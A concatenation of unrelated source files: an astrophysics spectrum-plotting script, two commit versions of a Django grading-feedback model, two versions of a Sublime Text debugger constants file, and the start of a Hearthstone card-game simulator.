names=['lambda_angstroms', 'f_lambda'], usecols=[0, 1])
print(f"Reference spectrum '{serieslabel}' has {len(specdata)} points in the plot range")
specdata.query('lambda_angstroms > @xmin and lambda_angstroms < @xmax', inplace=True)
print_integrated_flux(specdata.f_lambda, specdata.lambda_angstroms)
if len(specdata) > 5000:
# specdata = scipy.signal.resample(specdata, 10000)
# specdata = specdata.iloc[::3, :].copy()
specdata.query('index % 3 == 0', inplace=True)
print(f" downsamping to {len(specdata)} points")
# clamp negative values to zero
specdata['f_lambda'] = specdata['f_lambda'].apply(lambda x: max(0, x))
if flambdafilterfunc:
specdata['f_lambda'] = flambdafilterfunc(specdata['f_lambda'])
if normalised:
specdata['f_lambda_scaled'] = (specdata['f_lambda'] / specdata['f_lambda'].max() *
(scale_to_peak if scale_to_peak else 1.0))
ycolumnname = 'f_lambda_scaled'
else:
ycolumnname = 'f_lambda'
if 'linewidth' not in plotkwargs and 'lw' not in plotkwargs:
plotkwargs['linewidth'] = 1.5
lineplot = specdata.plot(x='lambda_angstroms', y=ycolumnname, ax=axis, label=serieslabel, zorder=-1, **plotkwargs)
return mpatches.Patch(color=lineplot.get_lines()[0].get_color())
def plot_artis_spectrum(axis, modelpath, args, from_packets=False, filterfunc=None, **plotkwargs):
specfilename = os.path.join(modelpath, 'spec.out')
(modelname, timestepmin, timestepmax,
time_days_lower, time_days_upper) = at.get_model_name_times(
specfilename, at.get_timestep_times(specfilename),
args.timestep, args.timemin, args.timemax)
linelabel = f'{modelname} at t={time_days_lower:.2f}d to {time_days_upper:.2f}d'
if from_packets:
# find any other packets files in the same directory
packetsfiles_thismodel = glob.glob(os.path.join(modelpath, 'packets**.out'))
print(packetsfiles_thismodel)
spectrum = at.spectra.get_spectrum_from_packets(
packetsfiles_thismodel, time_days_lower, time_days_upper, lambda_min=args.xmin, lambda_max=args.xmax)
else:
spectrum = at.spectra.get_spectrum(specfilename, timestepmin, timestepmax, fnufilterfunc=filterfunc)
spectrum.query('@args.xmin < lambda_angstroms and lambda_angstroms < @args.xmax', inplace=True)
at.spectra.print_integrated_flux(spectrum['f_lambda'], spectrum['lambda_angstroms'])
spectrum['f_lambda_scaled'] = spectrum['f_lambda'] / spectrum['f_lambda'].max()
ycolumnname = 'f_lambda_scaled' if args.normalised else 'f_lambda'
spectrum.plot(x='lambda_angstroms', y=ycolumnname, ax=axis,
label=linelabel, alpha=0.95, **plotkwargs)
def make_spectrum_plot(modelpaths, axis, filterfunc, args):
"""
Set up a matplotlib figure and plot observational and ARTIS spectra
"""
plot_reference_spectra(axis, [], [], args, flambdafilterfunc=filterfunc)
for index, modelpath in enumerate(modelpaths):
modelname = at.get_model_name(modelpath)
print(f"====> {modelname}")
plotkwargs = {}
# plotkwargs['dashes'] = dashesList[index]
# plotkwargs['dash_capstyle'] = dash_capstyleList[index]
plotkwargs['linestyle'] = '--' if (int(index / 7) % 2) else '-'
plotkwargs['linewidth'] = 2.5 - (0.2 * index)
plot_artis_spectrum(axis, modelpath, args=args, from_packets=args.frompackets,
filterfunc=filterfunc, **plotkwargs)
if args.normalised:
axis.set_ylim(ymin=-0.1, ymax=1.25)
axis.set_ylabel(r'Scaled F$_\lambda$')
def make_emission_plot(modelpath, axis, filterfunc, args):
from astropy import constants as const
maxion = 5 # must match sn3d.h value
emissionfilename = os.path.join(modelpath, 'emissiontrue.out')
if not os.path.exists(emissionfilename):
emissionfilename = os.path.join(modelpath, 'emission.out')
specfilename = os.path.join(modelpath, 'spec.out')
specdata = pd.read_csv(specfilename, delim_whitespace=True)
timearray = specdata.columns.values[1:]
arraynu = specdata.loc[:, '0'].values
arraylambda_angstroms = const.c.to('angstrom/s').value / arraynu
(modelname, timestepmin, timestepmax,
time_days_lower, time_days_upper) = at.get_model_name_times(
specfilename, timearray, args.timestep, args.timemin, args.timemax)
absorptionfilename = os.path.join(modelpath, 'absorption.out')
contribution_list, maxyvalueglobal, array_flambda_emission_total = at.spectra.get_flux_contributions(
emissionfilename, absorptionfilename, maxion, timearray, arraynu,
filterfunc, args.xmin, args.xmax, timestepmin, timestepmax)
at.spectra.print_integrated_flux(array_flambda_emission_total, arraylambda_angstroms)
# print("\n".join([f"{x[0]}, {x[1]}" for x in contribution_list]))
contributions_sorted_reduced = at.spectra.sort_and_reduce_flux_contribution_list(
contribution_list, args.maxseriescount, arraylambda_angstroms)
plotobjects = axis.stackplot(
arraylambda_angstroms, [x.array_flambda_emission for x in contributions_sorted_reduced], linewidth=0)
facecolors = [p.get_facecolor()[0] for p in plotobjects]
axis.stackplot(
arraylambda_angstroms, [-x.array_flambda_absorption for x in contributions_sorted_reduced],
colors=facecolors, linewidth=0)
plotobjectlabels = list([x.linelabel for x in contributions_sorted_reduced])
plot_reference_spectra(axis, plotobjects, plotobjectlabels, args, flambdafilterfunc=None,
scale_to_peak=(maxyvalueglobal if args.normalised else None), linewidth=0.5)
axis.axhline(color='white', linewidth=0.5)
plotlabel = f't={time_days_lower:.2f}d to {time_days_upper:.2f}d\n{modelname}'
axis.annotate(plotlabel, xy=(0.97, 0.03), xycoords='axes fraction',
horizontalalignment='right', verticalalignment='bottom', fontsize=9)
# axis.set_ylim(ymin=-0.05 * maxyvalueglobal, ymax=maxyvalueglobal * 1.3)
return plotobjects, plotobjectlabels
def make_plot(modelpaths, args):
import matplotlib.ticker as ticker
fig, axis = plt.subplots(1, 1, sharey=True, figsize=(8, 5), tight_layout={"pad": 0.2, "w_pad": 0.0, "h_pad": 0.0})
axis.set_ylabel(r'F$_\lambda$ at 1 Mpc [erg/s/cm$^2$/$\AA$]')
import scipy.signal
def filterfunc(flambda):
return scipy.signal.savgol_filter(flambda, 5, 3)
# filterfunc = None
if args.emissionabsorption:
plotobjects, plotobjectlabels = make_emission_plot(modelpaths[0], axis, filterfunc, args)
else:
make_spectrum_plot(modelpaths, axis, filterfunc, args)
plotobjects, plotobjectlabels = axis.get_legend_handles_labels()
axis.legend(plotobjects, plotobjectlabels, loc='best', handlelength=2,
frameon=False, numpoints=1, prop={'size': args.legendfontsize})
# plt.setp(plt.getp(axis, 'xticklabels'), fontsize=fsticklabel)
# plt.setp(plt.getp(axis, 'yticklabels'), fontsize=fsticklabel)
# for axis in ['top', 'bottom', 'left', 'right']:
# axis.spines[axis].set_linewidth(framewidth)
axis.set_xlabel(r'Wavelength ($\AA$)')
axis.set_xlim(xmin=args.xmin, xmax=args.xmax)
axis.xaxis.set_major_locator(ticker.MultipleLocator(base=1000))
axis.xaxis.set_minor_locator(ticker.MultipleLocator(base=100))
filenameout = args.outputfile
fig.savefig(filenameout, format='pdf')
# plt.show()
print(f'Saved {filenameout}')
plt.close()
if __name__ == "__main__":
main()
|
from datetime import datetime
from django.utils.translation import ugettext as _
from django.db import models
from django.db.models import Q
from django.contrib.auth.models import User
from abstract_is_admin import AbstractIsAdmin
from abstract_is_examiner import AbstractIsExaminer
from abstract_is_candidate import AbstractIsCandidate
from delivery import Delivery
from node import Node
class StaticFeedback(models.Model, AbstractIsAdmin, AbstractIsExaminer, AbstractIsCandidate):
""" Represents a feedback for a `Delivery`_.
Each delivery can have zero or more feedbacks. Each StaticFeedback object stores
static data that an examiner has published on a delivery. StaticFeedback is
created and edited in a *grade+feedback editor* in a *grade plugin*, and
when an examiner choose to publish feedback, a static copy of the data
he/she created in the *grade+feedback editor* is stored in a StaticFeedback.
Feedbacks are only visible to students when
:attr:`Deadline.feedbacks_published` on the related deadline is ``True``.
Feedbacks are related to Deadlines through its :attr:`delivery`.
Students are presented with the last feedback on a delivery, however they
can browse every StaticFeedback on their deliveries. This history is to protect
the student from administrators or examiners that change published
feedback to avoid that a student can make an issue out of a bad feedback.
**NOTE:** When a StaticFeedback is saved, the corresponding
:attr:`AssignmentGroup.feedback` is updated to the newly created
StaticFeedback.
.. attribute:: rendered_view
The rendered HTML view.
.. attribute:: saved_by
The django.contrib.auth.models.User_ that created the StaticFeedback.
.. attribute:: save_timestamp
Date/time when this feedback was created.
.. attribute:: delivery
A django.db.models.ForeignKey_ that points to the `Delivery`_ where this feedback belongs.
.. attribute:: grade
The grade as a short string (max 12 chars).
.. attribute:: points
The number of points (integer).
.. attribute:: is_passing_grade
Boolean is passing grade?
"""
delivery = models.ForeignKey(Delivery, related_name='feedbacks')
rendered_view = models.TextField(blank=True,
help_text=('A rendered HTML version of the feedback, containing '
'whatever the grade-editor chose to dump in this field.'))
grade = models.CharField(max_length=12, help_text='The rendered grade, such as "A" or "approved".')
points = models.PositiveIntegerField(help_text='Number of points given on this feedback.')
is_passing_grade = models.BooleanField(help_text='Is this a passing grade?')
save_timestamp = models.DateTimeField(blank=True, null=True,
help_text=('Time when this feedback was saved. Since StaticFeedback '
'is immutable, this never changes.'))
saved_by = models.ForeignKey(User, blank=False, null=False,
help_text='The user (examiner) who saved this feedback')
class Meta:
app_label = 'core'
verbose_name = 'Static feedback'
verbose_name_plural = 'Static feedbacks'
ordering = ['-save_timestamp']
@classmethod
def q_is_admin(cls, user_obj):
return Q(delivery__deadline__assignment_group__parentnode__admins=user_obj) | \
Q(delivery__deadline__assignment_group__parentnode__parentnode__admins=user_obj) | \
Q(delivery__deadline__assignment_group__parentnode__parentnode__parentnode__admins=user_obj) | \
Q(delivery__deadline__assignment_group__parentnode__parentnode__parentnode__parentnode__pk__in=Node._get_nodepks_where_isadmin(user_obj))
@classmethod
def q_is_candidate(cls, user_obj):
"""
Returns a django.models.Q object matching Deliveries where
the given student is candidate.
"""
return Q(delivery__deadline__assignment_group__candidates__student=user_obj)
@classmethod
def q_published(cls, old=True, active=True):
now = datetime.now()
q = Q(delivery__deadline__assignment_group__parentnode__publishing_time__lt = now)
if not active:
q &= ~Q(delivery__deadline__assignment_group__parentnode__parentnode__end_time__gte = now)
if not old:
q &= ~Q(delivery__deadline__assignment_group__parentnode__parentnode__end_time__lt = now)
return q
@classmethod
def q_is_examiner(cls, user_obj):
"""
Returns a django.models.Q object matching Feedbacks where
the given student is candidate.
"""
return Q(delivery__deadline__assignment_group__examiners__user=user_obj)
@classmethod
def from_points(cls, assignment, points, **kwargs):
"""
Shortcut method to initialize the StaticFeedback object
from points. We take the assignment as argument instead
of looking it up via ``self.delivery.deadline.assignment_group``
because we want to to be efficient when creating feedback in bulk.
Initializes a StaticFeedback with the given points, with grade
and is_passing_grade inferred from the points with the help
of :meth:`devilry.apps.core.models.Assignment.points_to_grade`
and :meth:`devilry.apps.core.models.Assignment.points_is_passing_grade`.
Example::
feedback = StaticFeedback.from_points(
assignment=myassignment,
points=10,
delivery=mydelivery,
saved_by=someuser)
assert(feedback.id == None)
assert(feedback.grade != None)
:param assignment:
An Assignment object. Should be the assignment where delivery
this feedback is for belongs, but that is not checked.
:param points:
The number of points for the feedback.
:param kwargs:
Extra kwargs for the StaticFeedback constructor.
:return: An (unsaved) StaticFeedback.
"""
is_passing_grade = assignment.points_is_passing_grade(points)
grade = assignment.points_to_grade(points)
return cls(
points=points,
is_passing_grade=is_passing_grade,
grade=grade, **kwargs
)
def _publish_if_allowed(self):
assignment = self.delivery.deadline.assignment_group.parentnode
if assignment.examiners_publish_feedbacks_directly:
deadline = self.delivery.deadline
deadline.feedbacks_published = True
deadline.save()
def _close_group(self):
self.delivery.deadline.assignment_group.is_open = False
self.delivery.deadline.assignment_group.save()
def save(self, *args, **kwargs):
"""
:param autoset_timestamp_to_now:
Automatically set the ``timestamp``-attribute of this model
to *now*? Defaults to ``True``.
:param autoupdate_related_models:
Automatically update related models:
- Sets the ``last_feedback``-attribute of ``self.delivery`` and saved the delivery.
- Sets the ``feedback`` and ``is_open`` attributes of
``self.delivery.deadline.assignment_group`` to this feedback, and ``False``.
Saves the AssignmentGroup.
Defaults to ``True``.
"""
autoupdate_related_models = kwargs.pop('autoupdate_related_models', True)
autoset_timestamp_to_now = kwargs.pop('autoset_timestamp_to_now', True)
if autoset_timestamp_to_now:
self.save_timestamp = datetime.now()
super(StaticFeedback, self).save(*args, **kwargs)
if autoupdate_related_models:
delivery = self.delivery
self.delivery.last_feedback = self
self.delivery.save(
autoset_time_of_delivery=False,
autoset_number=False)
group = delivery.deadline.assignment_group
group.feedback = self
group.is_open = False
group.save()
self._publish_if_allowed()
def __unicode__(self):
return "StaticFeedback on %s" % self.delivery
def copy(self, newdelivery):
"""
Copy this StaticFeedback into ``newdeadline``.
.. note::
This only copies the StaticFeedback, not any data related to it
via any grade editors.
.. warning::
This does not autoset the feedback as active on the group or as latest on the delivery.
You need to handle that yourself after the copy.
"""
feedbackcopy = StaticFeedback(delivery=newdelivery,
rendered_view=self.rendered_view,
grade=self.grade,
points=self.points,
is_passing_grade=self.is_passing_grade,
save_timestamp=self.save_timestamp,
saved_by=self.saved_by)
feedbackcopy.full_clean()
feedbackcopy.save(autoupdate_related_models=False,
autoset_timestamp_to_now=False)
return feedbackcopy
apps.cire.models.static_feedback: Make specifying assignment optional for from_points().
from datetime import datetime
from django.utils.translation import ugettext as _
from django.db import models
from django.db.models import Q
from django.contrib.auth.models import User
from abstract_is_admin import AbstractIsAdmin
from abstract_is_examiner import AbstractIsExaminer
from abstract_is_candidate import AbstractIsCandidate
from delivery import Delivery
from node import Node
class StaticFeedback(models.Model, AbstractIsAdmin, AbstractIsExaminer, AbstractIsCandidate):
""" Represents a feedback for a `Delivery`_.
Each delivery can have zero or more feedbacks. Each StaticFeedback object stores
static data that an examiner has published on a delivery. StaticFeedback is
created and edited in a *grade+feedback editor* in a *grade plugin*, and
when an examiner choose to publish feedback, a static copy of the data
he/she created in the *grade+feedback editor* is stored in a StaticFeedback.
Feedbacks are only visible to students when
:attr:`Deadline.feedbacks_published` on the related deadline is ``True``.
Feedbacks are related to Deadlines through its :attr:`delivery`.
Students are presented with the last feedback on a delivery, however they
can browse every StaticFeedback on their deliveries. This history is to protect
the student from administrators or examiners that change published
feedback to avoid that a student can make an issue out of a bad feedback.
**NOTE:** When a StaticFeedback is saved, the corresponding
:attr:`AssignmentGroup.feedback` is updated to the newly created
StaticFeedback.
.. attribute:: rendered_view
The rendered HTML view.
.. attribute:: saved_by
The django.contrib.auth.models.User_ that created the StaticFeedback.
.. attribute:: save_timestamp
Date/time when this feedback was created.
.. attribute:: delivery
A django.db.models.ForeignKey_ that points to the `Delivery`_ where this feedback belongs.
.. attribute:: grade
The grade as a short string (max 12 chars).
.. attribute:: points
The number of points (integer).
.. attribute:: is_passing_grade
Boolean is passing grade?
"""
delivery = models.ForeignKey(Delivery, related_name='feedbacks')
rendered_view = models.TextField(blank=True,
help_text=('A rendered HTML version of the feedback, containing '
'whatever the grade-editor chose to dump in this field.'))
grade = models.CharField(max_length=12, help_text='The rendered grade, such as "A" or "approved".')
points = models.PositiveIntegerField(help_text='Number of points given on this feedback.')
is_passing_grade = models.BooleanField(help_text='Is this a passing grade?')
save_timestamp = models.DateTimeField(blank=True, null=True,
help_text=('Time when this feedback was saved. Since StaticFeedback '
'is immutable, this never changes.'))
saved_by = models.ForeignKey(User, blank=False, null=False,
help_text='The user (examiner) who saved this feedback')
class Meta:
app_label = 'core'
verbose_name = 'Static feedback'
verbose_name_plural = 'Static feedbacks'
ordering = ['-save_timestamp']
@classmethod
def q_is_admin(cls, user_obj):
return Q(delivery__deadline__assignment_group__parentnode__admins=user_obj) | \
Q(delivery__deadline__assignment_group__parentnode__parentnode__admins=user_obj) | \
Q(delivery__deadline__assignment_group__parentnode__parentnode__parentnode__admins=user_obj) | \
Q(delivery__deadline__assignment_group__parentnode__parentnode__parentnode__parentnode__pk__in=Node._get_nodepks_where_isadmin(user_obj))
@classmethod
def q_is_candidate(cls, user_obj):
"""
Returns a django.models.Q object matching Deliveries where
the given student is candidate.
"""
return Q(delivery__deadline__assignment_group__candidates__student=user_obj)
@classmethod
def q_published(cls, old=True, active=True):
now = datetime.now()
q = Q(delivery__deadline__assignment_group__parentnode__publishing_time__lt = now)
if not active:
q &= ~Q(delivery__deadline__assignment_group__parentnode__parentnode__end_time__gte = now)
if not old:
q &= ~Q(delivery__deadline__assignment_group__parentnode__parentnode__end_time__lt = now)
return q
@classmethod
def q_is_examiner(cls, user_obj):
"""
Returns a django.models.Q object matching Feedbacks where
the given student is candidate.
"""
return Q(delivery__deadline__assignment_group__examiners__user=user_obj)
@classmethod
def from_points(cls, points, assignment=None, **kwargs):
"""
Shortcut method to initialize the StaticFeedback object
from points.
Initializes a StaticFeedback with the given points, with grade
and is_passing_grade inferred from the points with the help
of :meth:`devilry.apps.core.models.Assignment.points_to_grade`
and :meth:`devilry.apps.core.models.Assignment.points_is_passing_grade`.
Example::
feedback = StaticFeedback.from_points(
assignment=myassignment,
points=10,
delivery=mydelivery,
saved_by=someuser)
assert(feedback.id == None)
assert(feedback.grade != None)
:param points:
The number of points for the feedback.
:param assignment:
An Assignment object. Should be the assignment where delivery
this feedback is for belongs, but that is not checked.
Defaults to ``self.delivery.deadline.assignment_group.assignment``.
We provide the ability to take the assignment as argument instead
of looking it up via ``self.delivery.deadline.assignment_group``
because we want to to be efficient when creating feedback in bulk.
:param kwargs:
Extra kwargs for the StaticFeedback constructor.
:return: An (unsaved) StaticFeedback.
"""
if not assignment:
assignment = kwargs['delivery'].assignment
is_passing_grade = assignment.points_is_passing_grade(points)
grade = assignment.points_to_grade(points)
return cls(
points=points,
is_passing_grade=is_passing_grade,
grade=grade, **kwargs
)
def _publish_if_allowed(self):
assignment = self.delivery.deadline.assignment_group.parentnode
if assignment.examiners_publish_feedbacks_directly:
deadline = self.delivery.deadline
deadline.feedbacks_published = True
deadline.save()
def _close_group(self):
self.delivery.deadline.assignment_group.is_open = False
self.delivery.deadline.assignment_group.save()
def save(self, *args, **kwargs):
"""
:param autoset_timestamp_to_now:
Automatically set the ``timestamp``-attribute of this model
to *now*? Defaults to ``True``.
:param autoupdate_related_models:
Automatically update related models:
- Sets the ``last_feedback``-attribute of ``self.delivery`` and saved the delivery.
- Sets the ``feedback`` and ``is_open`` attributes of
``self.delivery.deadline.assignment_group`` to this feedback, and ``False``.
Saves the AssignmentGroup.
Defaults to ``True``.
"""
autoupdate_related_models = kwargs.pop('autoupdate_related_models', True)
autoset_timestamp_to_now = kwargs.pop('autoset_timestamp_to_now', True)
if autoset_timestamp_to_now:
self.save_timestamp = datetime.now()
super(StaticFeedback, self).save(*args, **kwargs)
if autoupdate_related_models:
delivery = self.delivery
self.delivery.last_feedback = self
self.delivery.save(
autoset_time_of_delivery=False,
autoset_number=False)
group = delivery.deadline.assignment_group
group.feedback = self
group.is_open = False
group.save()
self._publish_if_allowed()
def __unicode__(self):
return "StaticFeedback on %s" % self.delivery
def copy(self, newdelivery):
"""
Copy this StaticFeedback into ``newdeadline``.
.. note::
This only copies the StaticFeedback, not any data related to it
via any grade editors.
.. warning::
This does not autoset the feedback as active on the group or as latest on the delivery.
You need to handle that yourself after the copy.
"""
feedbackcopy = StaticFeedback(delivery=newdelivery,
rendered_view=self.rendered_view,
grade=self.grade,
points=self.points,
is_passing_grade=self.is_passing_grade,
save_timestamp=self.save_timestamp,
saved_by=self.saved_by)
feedbackcopy.full_clean()
feedbackcopy.save(autoupdate_related_models=False,
autoset_timestamp_to_now=False)
return feedbackcopy
|
DEFAULT_PORT = 4242 #9000
DEFAULT_IDE_KEY = 'sublime.grld'
PACKAGE_PATH = None
PACKAGE_FOLDER = None
FILE_LOG_OUTPUT = 'GRLD.log'
FILE_BREAKPOINT_DATA = 'GRLD.breakpoints'
FILE_PACKAGE_SETTINGS = 'GRLD.sublime-settings'
FILE_WATCH_DATA = 'GRLD.expressions'
KEY_SETTINGS = 'settings'
KEY_GRLD = 'grld'
KEY_PATH_MAPPING = "path_mapping"
KEY_IDE_KEY = "ide_key"
KEY_PORT = "port"
KEY_SUPER_GLOBALS = "super_globals"
KEY_MAX_DATA = "max_data"
KEY_MAX_DEPTH = "max_depth"
KEY_BREAK_ON_START = "break_on_start"
KEY_BREAK_ON_EXCEPTION = "break_on_exception"
KEY_CLOSE_ON_STOP = "close_on_stop"
KEY_DISABLE_LAYOUT = "disable_layout"
KEY_DEBUG_LAYOUT = "debug_layout"
KEY_DISABLE_SUBLIME_LINTER_GUTTER = "disable_sublime_linter_gutter"
KEY_BREAKPOINT_GROUP = "breakpoint_group"
KEY_BREAKPOINT_INDEX = "breakpoint_index"
KEY_CONTEXT_GROUP = "context_group"
KEY_CONTEXT_INDEX = "context_index"
KEY_STACK_GROUP = "stack_group"
KEY_STACK_INDEX = "stack_index"
KEY_WATCH_GROUP = "watch_group"
KEY_WATCH_INDEX = "watch_index"
KEY_COROUTINES_GROUP = "coroutines_group"
KEY_COROUTINES_INDEX = "coroutines_index"
KEY_EVALUATE_GROUP = "evaluate_group"
KEY_EVALUATE_INDEX = "evaluate_index"
KEY_ICONS_GROUP = "icons_group"
KEY_ICONS_INDEX = "icons_index"
KEY_BREAKPOINT_CURRENT = 'breakpoint_current'
KEY_BREAKPOINT_DISABLED = 'breakpoint_disabled'
KEY_BREAKPOINT_ENABLED = 'breakpoint_enabled'
KEY_CURRENT_LINE = 'current_line'
KEY_PYTHON_PATH = "python_path"
KEY_DEBUG = "debug"
# Region scope sources
REGION_KEY_BREAKPOINT = 'grld_breakpoint'
REGION_KEY_CURRENT = 'grld_current'
REGION_KEY_DISABLED = 'grld_disabled'
REGION_SCOPE_BREAKPOINT = 'comment.line.settings'
REGION_SCOPE_CURRENT = 'string.quoted.settings'
# Window layout for debugging output
LAYOUT_DEBUG = {
"cols": [0.0, 0.5, 1.0],
"rows": [0.0, 0.7, 1.0],
"cells": [[0, 0, 2, 1], [0, 1, 1, 2], [1, 1, 2, 2]]
}
# Default single layout (similar to Alt+Shift+1)
LAYOUT_NORMAL = {
"cols": [0.0, 1.0],
"rows": [0.0, 1.0],
"cells": [[0, 0, 1, 1]]
}
RESTORE_LAYOUT = None
RESTORE_INDEX = None
SESSION_BUSY = False
PROTOCOL = None
BREAKPOINT = {}
CONTEXT_DATA = {}
WATCH = []
BREAKPOINT_EXCEPTION = None
# Breakpoint line number in script being debugged
BREAKPOINT_ROW = None
# Placholder for temporary breakpoint filename and line number
BREAKPOINT_RUN = None
# Will hold breakpoint line number to show for file which is being loaded
SHOW_ROW_ONLOAD = {}
CONFIG_PROJECT = None
CONFIG_PACKAGE = None
CONFIG_KEYS = [
KEY_PATH_MAPPING,
KEY_IDE_KEY,
KEY_PORT,
KEY_SUPER_GLOBALS,
KEY_MAX_DATA,
KEY_MAX_DEPTH,
KEY_BREAK_ON_START,
KEY_BREAK_ON_EXCEPTION,
KEY_CLOSE_ON_STOP,
KEY_DISABLE_LAYOUT,
KEY_DEBUG_LAYOUT,
KEY_BREAKPOINT_GROUP,
KEY_BREAKPOINT_INDEX,
KEY_CONTEXT_GROUP,
KEY_CONTEXT_INDEX,
KEY_STACK_GROUP,
KEY_STACK_INDEX,
KEY_WATCH_GROUP,
KEY_WATCH_INDEX,
KEY_BREAKPOINT_CURRENT,
KEY_BREAKPOINT_DISABLED,
KEY_BREAKPOINT_ENABLED,
KEY_CURRENT_LINE,
KEY_PYTHON_PATH,
KEY_DEBUG
]
Update defaults for layout settings
DEFAULT_PORT = 4242 #9000
DEFAULT_IDE_KEY = 'sublime.grld'
PACKAGE_PATH = None
PACKAGE_FOLDER = None
FILE_LOG_OUTPUT = 'GRLD.log'
FILE_BREAKPOINT_DATA = 'GRLD.breakpoints'
FILE_PACKAGE_SETTINGS = 'GRLD.sublime-settings'
FILE_WATCH_DATA = 'GRLD.expressions'
KEY_SETTINGS = 'settings'
KEY_GRLD = 'grld'
KEY_PATH_MAPPING = "path_mapping"
KEY_IDE_KEY = "ide_key"
KEY_PORT = "port"
KEY_SUPER_GLOBALS = "super_globals"
KEY_MAX_DATA = "max_data"
KEY_MAX_DEPTH = "max_depth"
KEY_BREAK_ON_START = "break_on_start"
KEY_BREAK_ON_EXCEPTION = "break_on_exception"
KEY_CLOSE_ON_STOP = "close_on_stop"
KEY_DISABLE_LAYOUT = "disable_layout"
KEY_DEBUG_LAYOUT = "debug_layout"
KEY_DISABLE_SUBLIME_LINTER_GUTTER = "disable_sublime_linter_gutter"
KEY_BREAKPOINT_GROUP = "breakpoint_group"
KEY_BREAKPOINT_INDEX = "breakpoint_index"
KEY_CONTEXT_GROUP = "context_group"
KEY_CONTEXT_INDEX = "context_index"
KEY_STACK_GROUP = "stack_group"
KEY_STACK_INDEX = "stack_index"
KEY_WATCH_GROUP = "watch_group"
KEY_WATCH_INDEX = "watch_index"
KEY_COROUTINES_GROUP = "coroutines_group"
KEY_COROUTINES_INDEX = "coroutines_index"
KEY_EVALUATE_GROUP = "evaluate_group"
KEY_EVALUATE_INDEX = "evaluate_index"
KEY_ICONS_GROUP = "icons_group"
KEY_ICONS_INDEX = "icons_index"
KEY_BREAKPOINT_CURRENT = 'breakpoint_current'
KEY_BREAKPOINT_DISABLED = 'breakpoint_disabled'
KEY_BREAKPOINT_ENABLED = 'breakpoint_enabled'
KEY_CURRENT_LINE = 'current_line'
KEY_PYTHON_PATH = "python_path"
KEY_DEBUG = "debug"
# Region scope sources
REGION_KEY_BREAKPOINT = 'grld_breakpoint'
REGION_KEY_CURRENT = 'grld_current'
REGION_KEY_DISABLED = 'grld_disabled'
REGION_SCOPE_BREAKPOINT = 'comment.line.settings'
REGION_SCOPE_CURRENT = 'string.quoted.settings'
# Window layout for debugging output
LAYOUT_DEBUG = {
"cols": [0.0, 0.05, 0.15, 0.6, 1.0],
"rows": [0.0, 0.7, 1.0],
# main coroutines context stack icons
"cells": [[1, 0, 4, 1], [0, 1, 2, 2], [2, 1, 3, 2], [3, 1, 4, 2], [0, 0, 1, 1]]
}
# Default single layout (similar to Alt+Shift+1)
LAYOUT_NORMAL = {
"cols": [0.0, 1.0],
"rows": [0.0, 1.0],
"cells": [[0, 0, 1, 1]]
}
RESTORE_LAYOUT = None
RESTORE_INDEX = None
SESSION_BUSY = False
PROTOCOL = None
BREAKPOINT = {}
CONTEXT_DATA = {}
WATCH = []
BREAKPOINT_EXCEPTION = None
# Breakpoint line number in script being debugged
BREAKPOINT_ROW = None
# Placholder for temporary breakpoint filename and line number
BREAKPOINT_RUN = None
# Will hold breakpoint line number to show for file which is being loaded
SHOW_ROW_ONLOAD = {}
CONFIG_PROJECT = None
CONFIG_PACKAGE = None
CONFIG_KEYS = [
KEY_PATH_MAPPING,
KEY_IDE_KEY,
KEY_PORT,
KEY_SUPER_GLOBALS,
KEY_MAX_DATA,
KEY_MAX_DEPTH,
KEY_BREAK_ON_START,
KEY_BREAK_ON_EXCEPTION,
KEY_CLOSE_ON_STOP,
KEY_DISABLE_LAYOUT,
KEY_DEBUG_LAYOUT,
KEY_BREAKPOINT_GROUP,
KEY_BREAKPOINT_INDEX,
KEY_CONTEXT_GROUP,
KEY_CONTEXT_INDEX,
KEY_STACK_GROUP,
KEY_STACK_INDEX,
KEY_WATCH_GROUP,
KEY_WATCH_INDEX,
KEY_BREAKPOINT_CURRENT,
KEY_BREAKPOINT_DISABLED,
KEY_BREAKPOINT_ENABLED,
KEY_CURRENT_LINE,
KEY_PYTHON_PATH,
KEY_DEBUG
] |
import json
import logging
import os
import uuid
from xml.etree import ElementTree
from .entity import Entity
from .exceptions import *
from .targeting import *
from . import carddata
_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), os.path.pardir, "data", "TextAsset")
THE_COIN = "GAME_005"
class XMLCard(object):
def __init__(self, id):
self.file = os.path.join(_path, "%s.xml" % (id))
self.xml = ElementTree.parse(self.file)
def getTag(self, name):
tag = self.xml.findall('./Tag[@name="%s"]' % (name))
if not tag:
return 0
tag = tag[0]
value, type = tag.attrib["value"], tag.attrib["type"]
if type == "Bool":
return bool(int(value))
return int(value)
@property
def name(self):
return self.xml.findall("./Tag[@name='CardName']/enUS")[0].text
@property
def type(self):
return self.getTag("CardType")
@property
def health(self):
return self.getTag("Health")
@property
def durability(self):
return self.getTag("Durability")
@property
def atk(self):
return self.getTag("Atk")
@property
def cost(self):
return self.getTag("Cost")
@property
def race(self):
return self.getTag("Race")
@property
def charge(self):
return self.getTag("Charge")
@property
def taunt(self):
return self.getTag("Taunt")
@property
def divineShield(self):
return self.getTag("Divine Shield")
@property
def oneTurnEffect(self):
return self.getTag("OneTurnEffect")
@property
def hasAura(self):
return self.getTag("Aura")
class _Card(Entity, XMLCard):
STATUS_DECK = 1
STATUS_HAND = 2
STATUS_FIELD = 3
STATUS_GRAVEYARD = 4
STATUS_DISCARD = 5
TYPE_HERO = 3
TYPE_MINION = 4
TYPE_SPELL = 5
TYPE_ENCHANTMENT = 6
TYPE_WEAPON = 7
TYPE_HERO_POWER = 10
def __init__(self, id):
self.id = id
self.uuid = uuid.uuid4()
self.owner = None
self.status = self.STATUS_DECK
self.damageCounter = 0
self.durabilityCounter = 0
self.summoningSickness = False
self.weapon = None
self.armor = 0
super().__init__(id)
self.shield = self.divineShield
def __str__(self):
return self.name
def __repr__(self):
return "<%s (%r)>" % (self.__class__.__name__, self.name)
@property
def game(self):
return self.owner.game
##
# Properties affected by slots
@property
def health(self):
damage = self.damageCounter
health = self.getProperty("health")
return max(0, health - damage)
@property
def atk(self):
return self.getProperty("atk")
@property
def durability(self):
return self.getProperty("durability")
@property
def targets(self):
return self.getTargets(self.targeting)
def getTargets(self, t):
ret = []
if t & TARGET_FRIENDLY:
if t & TARGET_HERO:
ret.append(self.owner.hero)
if t & TARGET_MULTIPLE:
if t & TARGET_MINION:
ret += self.owner.field
if t & TARGET_ENEMY:
if t & TARGET_HERO:
ret.append(self.owner.opponent.hero)
if t & TARGET_MULTIPLE:
if t & TARGET_MINION:
ret += self.owner.opponent.field
return ret
def hasTarget(self):
return self.targeting and (not self.targeting & TARGET_MULTIPLE)
def isValidTarget(self, card):
if card not in self.targets:
return False
